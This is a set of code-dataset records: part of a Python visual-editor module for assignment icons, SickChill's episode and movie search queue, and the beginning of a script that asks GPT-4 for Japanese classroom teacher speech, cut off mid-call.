contNeeded, export,\n allowTrailingComma=True)\n return text\n\n def assignValues(self, tgtIcon, value):\n if isinstance(tgtIcon, nameicons.IdentifierIcon):\n try:\n globals()[tgtIcon.name] = value\n except Exception as err:\n raise icon.IconExecException(self, err)\n return\n if tgtIcon.__class__ in (listicons.TupleIcon, listicons.ListIcon):\n assignTargets = tgtIcon.argIcons()\n elif isinstance(tgtIcon, list):\n assignTargets = tgtIcon\n else:\n raise icon.IconExecException(tgtIcon, \"Not a valid assignment target\")\n if not hasattr(value, \"__len__\") or len(assignTargets) != len(value):\n raise icon.IconExecException(self, \"Could not unpack\")\n for target in assignTargets:\n if target is None:\n raise icon.IconExecException(self, \"Missing argument(s)\")\n for t, v in zip(assignTargets, value):\n self.assignValues(t, v)\n\n def doLayout(self, left, top, layout):\n for tgtList in self.tgtLists:\n tgtList.doLayout(layout)\n self.valueList.doLayout(layout)\n opWidth, opHeight = self.opSize\n heightAbove = opHeight // 2\n heightBelow = opHeight - heightAbove\n for tgtList in self.tgtLists:\n heightAbove = max(heightAbove, tgtList.spineTop)\n heightBelow = max(heightBelow, tgtList.spineHeight - tgtList.spineTop)\n heightAbove = max(heightAbove, self.valueList.spineTop)\n heightBelow = max(heightBelow, self.valueList.spineHeight-self.valueList.spineTop)\n leftSpineTop = heightAbove - self.tgtLists[0].spineTop\n self.sites.seqIn.yOffset = leftSpineTop + 1\n self.sites.seqOut.yOffset = leftSpineTop + self.tgtLists[0].spineHeight - 1\n self.sites.seqInsert.yOffset = heightAbove\n layout.updateSiteOffsets(self.sites.seqInsert)\n 
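\n# --- Illustrative aside, not part of the original file. ---\n# createAst() in this record builds the same tree the parser produces for a chained,\n# tuple-valued assignment; a quick stdlib cross-check of that shape:\nimport ast\n\n_node = ast.parse('a = b = 1, 2').body[0]\nassert isinstance(_node, ast.Assign)\nassert len(_node.targets) == 2  # one entry per '=' clause\nassert isinstance(_node.value, ast.Tuple)  # comma-separated values pack into a Tuple\n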
layout.doSubLayouts(self.sites.seqInsert, left, top + heightAbove)\n height = heightAbove + heightBelow\n width = self.sites.seqIn.xOffset - 1 + layout.width\n self.rect = (left, top, left + width, top + height)\n self.drawList = None\n self.layoutDirty = False\n\n def calcLayouts(self):\n opWidth, opHeight = self.opSize\n tgtListsLayouts = [tgtList.calcLayouts(argRequired=True)\n for tgtList in self.tgtLists]\n valueLayouts = self.valueList.calcLayouts(argRequired=True)\n layouts = []\n for valueLayout, *tgtLayouts in iconlayout.allCombinations(\n (valueLayouts, *tgtListsLayouts)):\n layout = iconlayout.Layout(self, opWidth, opHeight, opHeight // 2)\n # Calculate for assignment target lists (each clause of =)\n if tgtLayouts[0] is not None and len(tgtLayouts[0].rowWidths) >= 2:\n x = 0 # If first target group includes spine, don't offset\n else:\n x = inpSeqImage.width - 1\n for i, tgtLayout in enumerate(tgtLayouts):\n tgtLayout.mergeInto(layout, x, 0)\n x += tgtLayout.width + opWidth - 2\n # Calculate layout for assignment value(s)\n layout.width = x + 1\n valueLayout.mergeInto(layout, x, 0)\n layouts.append(layout)\n return self.debugLayoutFilter(layouts)\n\n def clipboardRepr(self, offset, iconsToCopy):\n return self._serialize(offset, iconsToCopy, numTargets=len(self.tgtLists))\n\n def highlightErrors(self, errHighlight):\n if errHighlight is not None:\n icon.Icon.highlightErrors(self, errHighlight)\n return\n self.errHighlight = None\n for tgtList in self.tgtLists:\n tgtSeries = getattr(self.sites, tgtList.siteSeriesName)\n listicons.highlightSeriesErrorsForContext(tgtSeries, 'store')\n for site in self.sites.values:\n if site.att is not None:\n site.att.highlightErrors(None)\n\n def textRepr(self):\n text = \"\"\n for tgtList in self.tgtLists:\n text += icon.seriesTextRepr(getattr(self.sites, tgtList.siteSeriesName)) + \\\n \" = \"\n return text + icon.seriesTextRepr(self.sites.values)\n\n def backspace(self, siteId, evt):\n siteName, index = iconsites.splitSeriesSiteId(siteId)\n topIcon = self.topLevelParent()\n win = self.window\n win.requestRedraw(topIcon.hierRect())\n #... There's an ugly hack, here, which happened because the original code was\n # written to replace the = with a comma (before entry icon backspacing was\n # established). Instead of rewriting the code, I just added calls to\n # backspaceComma after the existing code. 
This is wasteful, and will fail if\n        # backspaceComma ever adds comma text to the entry icon, which might happen.\n        if index == 0:\n            if siteName == \"targets0\":\n                return\n            if siteName == \"values\" and not hasattr(self.sites, 'targets1'):\n                # This is the only '=' in the assignment, convert it to a tuple\n                argIcons = [tgtSite.att for tgtSite in self.sites.targets0]\n                numTargets = len(argIcons)\n                argIcons += [valueSite.att for valueSite in self.sites.values]\n                newTuple = listicons.TupleIcon(window=win, noParens=True)\n                for i, arg in enumerate(argIcons):\n                    if arg is not None:\n                        self.replaceChild(None, self.siteOf(arg))\n                    newTuple.insertChild(arg, \"argIcons\", i)\n                self.replaceWith(newTuple)\n                cursorSite = iconsites.makeSeriesSiteId('argIcons', numTargets)\n                win.cursor.setToIconSite(newTuple, cursorSite)\n                newTuple.backspace(cursorSite, evt) # Also handles num args <= 1 case\n            else:\n                # Merge lists around '=' to convert it to ','\n                if siteName == \"values\":\n                    removetgtGrpIdx = len(self.tgtLists) - 1\n                    srcSite = \"targets%d\" % removetgtGrpIdx\n                    destSite = \"values\"\n                    destIdx = 0\n                    cursorIdx = len(getattr(self.sites, srcSite))\n                else:\n                    srcSite = siteName\n                    removetgtGrpIdx = int(siteName[7:])\n                    destSite = siteName[:7] + str(removetgtGrpIdx - 1)\n                    destIdx = len(getattr(self.sites, destSite))\n                    cursorIdx = destIdx\n                argIcons = [s.att for s in getattr(self.sites, srcSite)]\n                removeFromSite = iconsites.makeSeriesSiteId(srcSite, 0)\n                for _ in argIcons:\n                    self.replaceChild(None, removeFromSite)\n                self.insertChildren(argIcons, destSite, destIdx)\n                self.removeTargetGroup(removetgtGrpIdx)\n                cursorSite = iconsites.makeSeriesSiteId(destSite, cursorIdx)\n                win.cursor.setToIconSite(self, cursorSite)\n                listicons.backspaceComma(self, cursorSite, evt)\n        else:\n            # Cursor is on comma input. Delete if empty or previous site is empty\n            listicons.backspaceComma(self, siteId, evt)\n        return\n\n    def touchesPosition(self, x, y):\n        # Base class method can figure out from our drawList whether x, y touches the\n        # drawn part of the icon, but it can't identify the icon sub-part because our\n        # draw-list is unstable (since we sometimes draw a left input site).\n        if not icon.pointInRect((x, y), self.rect):\n            return None\n        if self.drawList is None:\n            print('Missing drawlist (%s)?' 
% self.dumpName())\n partId = 0\n for imgOffset, img in self.drawList:\n if img.width <= assignDragImage.width:\n continue\n partId += 1\n left, top = icon.addPoints(self.rect[:2], imgOffset)\n imgX = x - left\n imgY = y - top\n if icon.pointInRect((imgX, imgY), (0, 0, img.width, img.height)):\n pixel = img.getpixel((imgX, imgY))\n return partId if pixel[3] > 128 else None\n return None\n\n def offsetOfPart(self, partId):\n if self.drawList is None or len(self.drawList) == 0:\n return 0, 0\n iconPartId = 0\n for imgOffset, img in self.drawList:\n if img.width <= assignDragImage.width:\n continue\n iconPartId += 1\n if partId <= iconPartId:\n return imgOffset\n print('assign icon offsetOfPart failed 2')\n return self.drawList[-1][0]\n\nclass AugmentedAssignIcon(icon.Icon):\n def __init__(self, op, window, location=None):\n icon.Icon.__init__(self, window)\n self.op = op\n bodyWidth = icon.getTextSize(self.op + '=')[0] + 2 * icon.TEXT_MARGIN + 1\n bodyHeight = icon.minTxtIconHgt\n self.bodySize = (bodyWidth, bodyHeight)\n siteYOffset = bodyHeight // 2\n targetXOffset = icon.dragSeqImage.width-1 - icon.OUTPUT_SITE_DEPTH\n self.sites.add('targetIcon', 'input', targetXOffset, siteYOffset)\n seqX = icon.dragSeqImage.width - 1\n self.sites.add('seqIn', 'seqIn', seqX, 1)\n self.sites.add('seqOut', 'seqOut', seqX, bodyHeight-2)\n self.sites.add('seqInsert', 'seqInsert', 0, siteYOffset)\n self.targetWidth = icon.EMPTY_ARG_WIDTH\n argX = icon.dragSeqImage.width + self.targetWidth + bodyWidth\n self.valuesList = iconlayout.ListLayoutMgr(self, 'values', argX, siteYOffset,\n simpleSpine=True)\n totalWidth = argX + self.valuesList.width - 2\n x, y = (0, 0) if location is None else location\n self.rect = (x, y, x + totalWidth, y + bodyHeight)\n\n def draw(self, toDragImage=None, location=None, clip=None, style=0):\n if toDragImage is None:\n temporaryDragSite = False\n else:\n # When image is specified the icon is being dragged, and it must display\n # its sequence-insert snap site unless it is in a sequence and not the start.\n self.drawList = None\n temporaryDragSite = self.prevInSeq() is None\n if self.drawList is None:\n self.drawList = []\n bodyWidth, bodyHeight = self.bodySize\n # Left site (seq site bar + 1st target input or drag-insert site\n tgtSiteX = self.sites.targetIcon.xOffset\n tgtSiteY = self.sites.targetIcon.yOffset\n if temporaryDragSite:\n y = tgtSiteY - assignDragImage.height // 2\n self.drawList.append(((0, y), assignDragImage))\n else:\n y = tgtSiteY - inpSeqImage.height // 2\n self.drawList.append(((tgtSiteX, y), inpSeqImage))\n img = Image.new('RGBA', (bodyWidth, bodyHeight), color=(0, 0, 0, 0))\n targetOffset = icon.dragSeqImage.width - 1\n bodyOffset = targetOffset + self.targetWidth - 1\n txtImg = icon.iconBoxedText(self.op + '=')\n img.paste(txtImg, (0, 0))\n inImageX = bodyWidth - icon.inSiteImage.width\n inImageY = bodyHeight // 2 - icon.inSiteImage.height // 2\n img.paste(icon.inSiteImage, (inImageX, inImageY))\n bodyTopY = self.sites.seqIn.yOffset - 1\n self.drawList.append(((bodyOffset, bodyTopY), img))\n # Minimal spines (if list has multi-row layout)\n argsOffset = bodyOffset + bodyWidth - 1 - icon.OUTPUT_SITE_DEPTH\n cntrSiteY = bodyTopY + bodyHeight // 2\n self.drawList += self.valuesList.drawSimpleSpine(argsOffset, cntrSiteY)\n # Commas\n self.drawList += self.valuesList.drawListCommas(argsOffset, cntrSiteY)\n self._drawFromDrawList(toDragImage, location, clip, style)\n self._drawEmptySites(toDragImage, clip, hilightEmptySeries=True)\n if temporaryDragSite:\n 
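\n# --- Illustrative aside, not part of the original file; _hit_test is hypothetical. ---\n# touchesPosition() above counts a click as a hit only when the pixel under it is\n# mostly opaque (alpha > 128). The same per-pixel test in isolation:\ndef _hit_test(img, x, y, threshold=128):\n    # img is an RGBA PIL image; (x, y) are image-local coordinates\n    if not (0 <= x < img.width and 0 <= y < img.height):\n        return False\n    return img.getpixel((x, y))[3] > threshold\n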
self.drawList = None\n\n def snapLists(self, forCursor=False):\n # Add snap sites for insertion\n siteSnapLists = icon.Icon.snapLists(self, forCursor=forCursor)\n siteSnapLists['insertInput'] = self.valuesList.makeInsertSnapList()\n return siteSnapLists\n\n def doLayout(self, left, top, layout):\n self.valuesList.doLayout(layout)\n self.targetWidth = layout.targetWidth\n bodyWidth, bodyHeight = self.bodySize\n heightAbove = bodyHeight // 2\n heightBelow = bodyHeight - heightAbove\n width = icon.dragSeqImage.width - 1 + bodyWidth - 1 + self.targetWidth - 1 + \\\n self.valuesList.width - 1\n if self.valuesList.simpleSpineWillDraw():\n heightAbove = max(heightAbove, self.valuesList.spineTop)\n heightBelow = max(heightBelow, self.valuesList.spineHeight -\n self.valuesList.spineTop)\n self.sites.seqInsert.yOffset = heightAbove\n self.sites.seqIn.yOffset = heightAbove - bodyHeight // 2 + 1\n self.sites.seqOut.yOffset = self.sites.seqIn.yOffset + bodyHeight - 2\n height = heightAbove + heightBelow\n self.rect = (left, top, left + width, top + height)\n layout.updateSiteOffsets(self.sites.seqInsert)\n layout.doSubLayouts(self.sites.seqInsert, left, top + heightAbove)\n self.drawList = None\n self.layoutDirty = False\n\n def calcLayouts(self):\n bodyWidth, bodyHeight = self.bodySize\n valueListLayouts = self.valuesList.calcLayouts(argRequired=True)\n targetIcon = self.sites.targetIcon.att\n tgtLayouts = [None] if targetIcon is None else targetIcon.calcLayouts()\n layouts = []\n for valueListLayout, tgtLayout in iconlayout.allCombinations(\n (valueListLayouts, tgtLayouts)):\n layout = iconlayout.Layout(self, bodyWidth, bodyHeight, 1)\n layout.addSubLayout(tgtLayout, 'targetIcon', 0, 0)\n tgtWidth = icon.EMPTY_ARG_WIDTH if tgtLayout is None else tgtLayout.width\n valuesXOffset = tgtWidth - 1 + bodyWidth - 1\n valueListLayout.mergeInto(layout, valuesXOffset, 0)\n layout.width = valuesXOffset + valueListLayout.width - 1\n layout.targetWidth = tgtWidth\n layouts.append(layout)\n return self.debugLayoutFilter(layouts)\n\n def textRepr(self):\n if self.sites.targetIcon.att is None:\n target = \" \"\n else:\n target = self.sites.targetIcon.att.textRepr()\n argText = icon.seriesTextRepr(self.sites.values)\n return target + ' ' + self.op + '=' + ' ' + argText\n\n def dumpName(self):\n return self.op + '='\n\n def clipboardRepr(self, offset, iconsToCopy):\n return self._serialize(offset, iconsToCopy, op=self.op)\n\n def highlightErrors(self, errHighlight):\n if errHighlight is None:\n self.errHighlight = None\n listicons.highlightErrorsForContext(self.sites.targetIcon, \"store\")\n for site in self.sites.values:\n if site.att is not None:\n site.att.highlightErrors(None)\n else:\n icon.Icon.highlightErrors(self, errHighlight)\n\n def execute(self):\n return None #... 
no idea what to do here, yet.\n\n def createAst(self):\n # Get the target and value icons\n if self.sites.targetIcon.att is None:\n raise icon.IconExecException(self, \"Missing assignment target\")\n tgtAst = self.sites.targetIcon.att.createAst()\n values = []\n for site in self.sites.values:\n if site.att is None:\n raise icon.IconExecException(self, \"Missing assignment value\")\n values.append(site.att)\n # If there are multiple values, make a tuple out of them\n if len(values) == 1:\n valueAst = values[0].createAst()\n else:\n valueAst = ast.Tuple([v.createAst() for v in values], ctx=ast.Load(),\n lineno=self.id, col_offset=0)\n opAst = opicons.binOpAsts[self.op]()\n return ast.AugAssign(tgtAst, opAst, valueAst, lineno=self.id, col_offset=0)\n\n def createSaveText(self, parentBreakLevel=0, contNeeded=True, export=False):\n brkLvl = parentBreakLevel + 1\n text = icon.argSaveText(brkLvl, self.sites.targetIcon, contNeeded, export)\n text.add(None, \" \" + self.op + \"= \")\n icon.addSeriesSaveText(text, brkLvl, self.sites.values, contNeeded, export,\n allowTrailingComma=True)\n return text\n\n def backspace(self, siteId, evt):\n siteName, index = iconsites.splitSeriesSiteId(siteId)\n if siteName == \"values\" and index == 0:\n # Cursor is on first input site. Remove icon and replace with entry icon\n entryIcon = self._becomeEntryIcon()\n self.window.cursor.setToText(entryIcon, drawNew=False)\n elif siteName == \"values\":\n # Cursor is on comma input. Delete if empty or previous site is empty\n listicons.backspaceComma(self, siteId, evt)\n\n def offsetOfPart(self, partId):\n width, _ = self.bodySize\n return self.sites.values[0].xOffset - width, 0\n\n def becomeEntryIcon(self, clickPos=None, siteAfter=None):\n if clickPos is not None:\n textOriginX = self.rect[0] + icon.dragSeqImage.width - 1 + \\\n self.targetWidth - 1 + icon.TEXT_MARGIN\n textOriginY = self.rect[1] + self.sites.targetIcon.yOffset\n cursorTextIdx, cursorWindowPos = icon.cursorInText(\n (textOriginX, textOriginY), clickPos, icon.globalFont, self.op + '=')\n if cursorTextIdx is None:\n return None, None\n entryIcon = self._becomeEntryIcon()\n entryIcon.setCursorPos(cursorTextIdx)\n return entryIcon, cursorWindowPos\n if siteAfter is None or siteAfter == 'values_0':\n return self._becomeEntryIcon()\n return None\n\n def _becomeEntryIcon(self):\n win = self.window\n text = self.op + '='\n valueIcons = [s.att for s in self.sites.values if s.att is not None]\n targetIcon = self.childAt(\"targetIcon\")\n if len(valueIcons) in (0, 1):\n # Zero or one argument, convert to entry icon (with pending arg if\n # there was an argument) attached to name icon\n win.requestRedraw(self.topLevelParent().hierRect(),\n filterRedundantParens=True)\n if self.parent() is not None:\n print('AugmentedAssign has parent?????')\n return\n entryIcon = entryicon.EntryIcon(initialString=text, window=win)\n if targetIcon is None:\n win.replaceTop(self, entryIcon)\n else:\n self.replaceChild(None, 'targetIcon')\n win.replaceTop(self, targetIcon)\n targetIcon.replaceChild(entryIcon, 'attrIcon')\n if len(valueIcons) == 1:\n entryIcon.appendPendingArgs([valueIcons[0]])\n else:\n # Multiple remaining arguments: convert to tuple with entry icon as\n # first element\n win.requestRedraw(self.topLevelParent().hierRect(),\n filterRedundantParens=True)\n valueIcons = [s.att for s in self.sites.values if s.att is not None]\n newTuple = listicons.TupleIcon(window=win, noParens=True)\n if targetIcon is None:\n entryIcon = entryicon.EntryIcon(initialString=text, 
window=win)\n newTuple.replaceChild(entryIcon, \"argIcons_0\")\n else:\n entryIcon = entryicon.EntryIcon(initialString=text, window=win)\n targetIcon.replaceChild(entryIcon, 'attrIcon')\n newTuple.replaceChild(targetIcon, 'argIcons_0')\n for i, arg in enumerate(valueIcons):\n if i == 0:\n entryIcon.appendPendingArgs([arg])\n else:\n self.replaceChild(None, self.siteOf(arg))\n newTuple.insertChild(arg, \"argIcons\", i)\n win.replaceTop(self, newTuple)\n return entryIcon\n\ndef createAssignIconFromAst(astNode, window):\n topIcon = AssignIcon(len(astNode.targets), window)\n for i, tgt in enumerate(astNode.targets):\n if isinstance(tgt, ast.Tuple) and not hasattr(tgt, 'tupleHasParens'):\n tgtIcons = [icon.createFromAst(t, window) for t in tgt.elts]\n else:\n tgtIcons = [icon.createFromAst(tgt, window)]\n topIcon.insertChildren(tgtIcons, \"targets%d\" % i, 0)\n if isinstance(astNode.value, ast.Tuple) and not \\\n hasattr(astNode.value, 'tupleHasParens'):\n valueIcons = [icon.createFromAst(v, window) for v in astNode.value.elts]\n topIcon.insertChildren(valueIcons, \"values\", 0)\n if len(valueIcons) == 1:\n topIcon.insertChild(None, \"values\", 1)\n else:\n topIcon.replaceChild(icon.createFromAst(astNode.value, window), \"values_0\")\n return topIcon\nicon.registerIconCreateFn(ast.Assign, createAssignIconFromAst)\n\ndef createAugmentedAssignIconFromAst(astNode, window):\n assignIcon = AugmentedAssignIcon(opicons.binOps[astNode.op.__class__], window)\n targetIcon = icon.createFromAst(astNode.target, window)\n assignIcon.replaceChild(targetIcon, \"targetIcon\")\n if isinstance(astNode.value, ast.Tuple):\n valueIcons = [icon.createFromAst(v, window) for v in astNode.value.elts]\n assignIcon.insertChildren(valueIcons, \"values\", 0)\n if len(valueIcons) == 1:\n assignIcon.insertChild(None, \"values\", 1)\n else:\n assignIcon.replaceChild(icon.createFromAst(astNode.value, window), \"values_0\")\n return assignIcon\nicon.registerIconCreateFn(ast.AugAssign, createAugmentedAssignIconFromAst)\n","repo_name":"markedel/python-g","sub_path":"assignicons.py","file_name":"assignicons.py","file_ext":"py","file_size_in_byte":31872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13089804508","text":"import time\nimport traceback\nfrom typing import TYPE_CHECKING\n\nfrom sickchill import logger, settings\nfrom sickchill.show.History import History\n\nif TYPE_CHECKING:\n from sickchill.oldbeard.databases.movie import Movie\n\nfrom . 
import common, generic_queue, search, ui\n\nBACKLOG_SEARCH = 10\nDAILY_SEARCH = 20\nFAILED_SEARCH = 30\nMANUAL_SEARCH = 40\n\nMANUAL_SEARCH_HISTORY = []\nMANUAL_SEARCH_HISTORY_SIZE = 100\n\n\nclass SearchQueue(generic_queue.GenericQueue):\n def __init__(self):\n super().__init__()\n self.queue_name = \"SEARCHQUEUE\"\n\n def is_in_queue(self, show, segment):\n for cur_item in self.queue:\n if isinstance(cur_item, BacklogQueueItem) and cur_item.show == show and cur_item.segment == segment:\n return True\n return False\n\n def is_ep_in_queue(self, segment):\n for cur_item in self.queue:\n if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and cur_item.segment == segment:\n return True\n return False\n\n def is_show_in_queue(self, show):\n for cur_item in self.queue:\n if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and cur_item.show.indexerid == show:\n return True\n return False\n\n def is_movie_in_queue(self, movie: \"Movie\"):\n for cur_item in self.queue:\n if isinstance(cur_item, MovieQueueItem) and cur_item.movie.pk == movie.pk:\n return True\n return False\n\n def get_all_ep_from_queue(self, show):\n ep_obj_list = []\n for cur_item in self.queue:\n if isinstance(cur_item, (ManualSearchQueueItem, FailedQueueItem)) and str(cur_item.show.indexerid) == show:\n ep_obj_list.append(cur_item)\n return ep_obj_list\n\n def pause_backlog(self):\n self.min_priority = generic_queue.QueuePriorities.HIGH\n\n def unpause_backlog(self):\n self.min_priority = 0\n\n def is_backlog_paused(self):\n # backlog priorities are NORMAL, this should be done properly somewhere\n return self.min_priority >= generic_queue.QueuePriorities.NORMAL\n\n def is_manualsearch_in_progress(self):\n # Only referenced in webserve.py, only current running manualsearch or failedsearch is needed!!\n if isinstance(self.currentItem, (ManualSearchQueueItem, FailedQueueItem)):\n return True\n return False\n\n def is_backlog_in_progress(self):\n for cur_item in self.queue + [self.currentItem]:\n if isinstance(cur_item, (BacklogQueueItem, MovieQueueItem)):\n return True\n return False\n\n def is_dailysearch_in_progress(self):\n for cur_item in self.queue + [self.currentItem]:\n if isinstance(cur_item, DailySearchQueueItem):\n return True\n return False\n\n def queue_length(self):\n length = {\"backlog\": 0, \"daily\": 0, \"manual\": 0, \"failed\": 0}\n for cur_item in self.queue + [self.currentItem]:\n if isinstance(cur_item, DailySearchQueueItem):\n length[\"daily\"] += 1\n elif isinstance(cur_item, (BacklogQueueItem, MovieQueueItem)):\n length[\"backlog\"] += 1\n elif isinstance(cur_item, ManualSearchQueueItem):\n length[\"manual\"] += 1\n elif isinstance(cur_item, FailedQueueItem):\n length[\"failed\"] += 1\n return length\n\n def add_item(self, item):\n add_item = False\n if isinstance(item, DailySearchQueueItem):\n # daily searches\n add_item = True\n elif isinstance(item, BacklogQueueItem):\n # backlog searches\n add_item = not self.is_in_queue(item.show, item.segment)\n elif isinstance(item, (ManualSearchQueueItem, FailedQueueItem)):\n # manual and failed searches\n add_item = not self.is_ep_in_queue(item.segment)\n elif isinstance(item, MovieQueueItem):\n add_item = not self.is_movie_in_queue(item.movie)\n else:\n logger.debug(\"Not adding item, it's already in the queue\")\n\n if add_item:\n super().add_item(item)\n\n\nclass DailySearchQueueItem(generic_queue.QueueItem):\n def __init__(self):\n super().__init__(\"Daily Search\", DAILY_SEARCH)\n self.success = None\n\n def run(self):\n 
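\n# --- Illustrative aside, not part of the original file; _DedupQueue is hypothetical. ---\n# add_item() above probes the queue for an equivalent pending item before enqueueing,\n# so duplicate backlog/manual searches are dropped instead of queued twice. The core\n# of that pattern:\nclass _DedupQueue:\n    def __init__(self):\n        self.queue = []\n\n    def add_item(self, item, key=lambda i: i):\n        # skip items whose key already matches a queued item\n        if not any(key(queued) == key(item) for queued in self.queue):\n            self.queue.append(item)\n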
super().run()\n\n try:\n logger.info(\"Beginning daily search for new episodes\")\n found_results = search.searchForNeededEpisodes()\n\n if not found_results:\n logger.info(\"No needed episodes found\")\n else:\n for result in found_results:\n # just use the first result for now\n logger.info(f\"Downloading {result.name} from {result.provider.name}\")\n self.success = search.snatchEpisode(result)\n\n # give the CPU a break\n time.sleep(common.cpu_presets[settings.CPU_PRESET])\n except Exception:\n logger.debug(traceback.format_exc())\n\n if self.success is None:\n self.success = False\n\n super().finish()\n self.finish()\n\n\nclass ManualSearchQueueItem(generic_queue.QueueItem):\n def __init__(self, show, segment, downCurQuality=False):\n super().__init__(\"Manual Search\", MANUAL_SEARCH)\n self.priority = generic_queue.QueuePriorities.HIGH\n self.name = f\"MANUAL-{show.indexerid}\"\n self.success = None\n self.show = show\n self.segment = segment\n self.started = None\n self.downCurQuality = downCurQuality\n\n def run(self):\n super().run()\n\n try:\n logger.info(f\"Beginning manual search for: [{self.segment.pretty_name}]\")\n self.started = True\n\n search_result = search.searchProviders(self.show, [self.segment], True, self.downCurQuality)\n\n if search_result:\n # just use the first result for now\n logger.info(f\"Downloading {search_result[0].name} from {search_result[0].provider.name}\")\n self.success = search.snatchEpisode(search_result[0])\n\n # give the CPU a break\n time.sleep(common.cpu_presets[settings.CPU_PRESET])\n\n else:\n ui.notifications.message(\"No downloads were found\", \"Couldn't find a download for {0}\".format(self.segment.pretty_name))\n\n logger.info(f\"Unable to find a download for: [{self.segment.pretty_name}]\")\n\n except Exception:\n logger.debug(traceback.format_exc())\n\n # ## Keep a list with the 100 last executed searches\n fifo(MANUAL_SEARCH_HISTORY, self, MANUAL_SEARCH_HISTORY_SIZE)\n\n if self.success is None:\n self.success = False\n\n super().finish()\n self.finish()\n\n\nclass BacklogQueueItem(generic_queue.QueueItem):\n def __init__(self, show, segment):\n super().__init__(\"Backlog\", BACKLOG_SEARCH)\n self.priority = generic_queue.QueuePriorities.LOW\n self.name = f\"BACKLOG-{show.indexerid}\"\n self.success = None\n self.show = show\n self.segment = segment\n\n def run(self):\n super().run()\n\n if not self.show.paused:\n try:\n logger.info(f\"Beginning backlog search for: [{self.show.name}]\")\n searchResult = search.searchProviders(self.show, self.segment, False)\n\n if searchResult:\n for result in searchResult:\n # just use the first result for now\n logger.info(f\"Downloading {result.name} from {result.provider.name}\")\n search.snatchEpisode(result)\n\n # give the CPU a break\n time.sleep(common.cpu_presets[settings.CPU_PRESET])\n else:\n logger.info(f\"No needed episodes found during backlog search for: [{self.show.name}]\")\n except Exception:\n logger.debug(traceback.format_exc())\n\n super().finish()\n self.finish()\n\n\nclass MovieQueueItem(generic_queue.QueueItem):\n def __init__(self, movie: \"Movie\"):\n super().__init__(\"Movie\", BACKLOG_SEARCH)\n self.priority = generic_queue.QueuePriorities.LOW\n self.name = f\"BACKLOG-{movie.tmdb_id}\"\n self.success = None\n self.movie = movie\n\n def run(self):\n super().run()\n\n if not self.movie.paused:\n try:\n logger.info(f\"Beginning backlog search for: [{self.movie.name}]\")\n settings.movie_list.search_providers(self.movie)\n for result in self.movie.results:\n # just use the 
first result for now\n                    logger.info(f\"Downloading {result.name} from {result.provider}\")\n                    settings.movie_list.snatch_movie(result)\n\n                    # give the CPU a break\n                    time.sleep(common.cpu_presets[settings.CPU_PRESET])\n                if not self.movie.results:\n                    logger.info(_(\"No needed movie results found during backlog search for: [{name}]\".format(name=self.movie.name)))\n            except Exception:\n                logger.debug(traceback.format_exc())\n\n        super().finish()\n        self.finish()\n\n\nclass FailedQueueItem(generic_queue.QueueItem):\n    def __init__(self, show, segment, downCurQuality=False):\n        super().__init__(\"Retry\", FAILED_SEARCH)\n        self.priority = generic_queue.QueuePriorities.HIGH\n        self.name = f\"RETRY-{show.indexerid}\"\n        self.show = show\n        self.segment = segment\n        self.success = None\n        self.started = None\n        self.downCurQuality = downCurQuality\n\n    def run(self):\n        super().run()\n        self.started = True\n\n        try:\n            for epObj in self.segment:\n                History().markFailed(epObj)\n                logger.info(f\"Beginning failed download search for: [{epObj.pretty_name}]\")\n\n            # If it is wanted, self.downCurQuality doesn't matter\n            # if it isn't wanted, we need to make sure to not overwrite the existing ep that we reverted to!\n            search_result = search.searchProviders(self.show, self.segment, True)\n\n            if search_result:\n                for result in search_result:\n                    # just use the first result for now\n                    logger.info(f\"Downloading {result.name} from {result.provider.name}\")\n                    search.snatchEpisode(result)\n\n                    # give the CPU a break\n                    time.sleep(common.cpu_presets[settings.CPU_PRESET])\n            else:\n                pass\n                # logger.info(f\"No valid episode found to retry for: [{self.segment.pretty_name}]\")\n        except Exception:\n            logger.debug(traceback.format_exc())\n\n        # ## Keep a list with the 100 last executed searches\n        fifo(MANUAL_SEARCH_HISTORY, self, MANUAL_SEARCH_HISTORY_SIZE)\n\n        if self.success is None:\n            self.success = False\n\n        super().finish()\n        self.finish()\n\n\ndef fifo(my_list, item, max_size=100):\n    if len(my_list) >= max_size:\n        my_list.pop(0)\n    my_list.append(item)\n","repo_name":"SickChill/sickchill","sub_path":"sickchill/oldbeard/search_queue.py","file_name":"search_queue.py","file_ext":"py","file_size_in_byte":11193,"program_lang":"python","lang":"en","doc_type":"code","stars":2371,"dataset":"github-code","pt":"37"} +{"seq_id":"34329452643","text":"import os\nimport openai\nfrom dotenv import load_dotenv\nimport json\n\n# A simple script that asks GPT-4 questions\n\n# Get the API key and pass it to the client\nload_dotenv()\napi_key = os.environ['OPENAI_API_KEY']\nprint(api_key)\nopenai.api_key=api_key\n\n\noperating =\\\n\"#あなたは小学校の教師です。\\\n#あなたに与えた「時間」、「学習活動」、「指導上の留意点」、「評価の観点」の項目を踏まえて、「そのセクションにおける教師の発話」を答えてください。\\\n#「学習活動」とは、授業内で生徒が達成するべき活動であり、教師の発話は学習活動が全て行えるように促すものになります。\\\n#出力する「教師の発話」とは、そのセクション内で行う学習活動や指導上の留意点の項目がすべて達成できるように、教師が生徒の前で話すような発言のことを指します。\\\n「教師の発話」では、教師は授業を聞いている生徒のことを意識し、常に生徒たちの学習状況を気にかける必要があります。\\\n例えば、「どうですか?理解できましたか?」「一度整理のために時間を取りますね。」などのように、時々教師が生徒に寄り添うような発言を入れてください。\\\nまた、あなたは生徒に好かれる教師なので、ユーモアに富んだ語りをします。\\\n#教師の発話では口調を統一してください。以下の例で挙げている文章と同じ口調で話してください。\\\n#教師の発話以外の内容は発言しないでください。\\\n#以下は「教師の発話」の例です。\\\n「みなさん、こんにちは。今日も一緒に楽しく学んでいきましょうね。さて、前回の授業では、私たちの体のどの部分が曲がるか、そしてその理由について勉強したこと、みんなは覚えていますか?\\\n手や腕がどのように動くか、一緒に思い出してみましょう。例えば、腕を曲げるとき、どの部分が動いているか覚えてる?\\\nそう、関節が動いていたよね。では、関節以外に動いている部分は何だったかな?そう、筋肉も動いているんだ。\\\nどうですか?もしわからないことがあれば、遠慮なく質問してくださいね。一度整理のために時間を取りますね。」\"\n\n\n\ndef generate_text(prompt, conversation_history):\n\n    # Append the prompt to the conversation history\n    conversation_history.append({\"role\": \"user\", \"content\": prompt})\n\n    # When using the GPT-4 model\n    response = openai.ChatCompletion.create(\n        model=\"gpt-4\",\n        
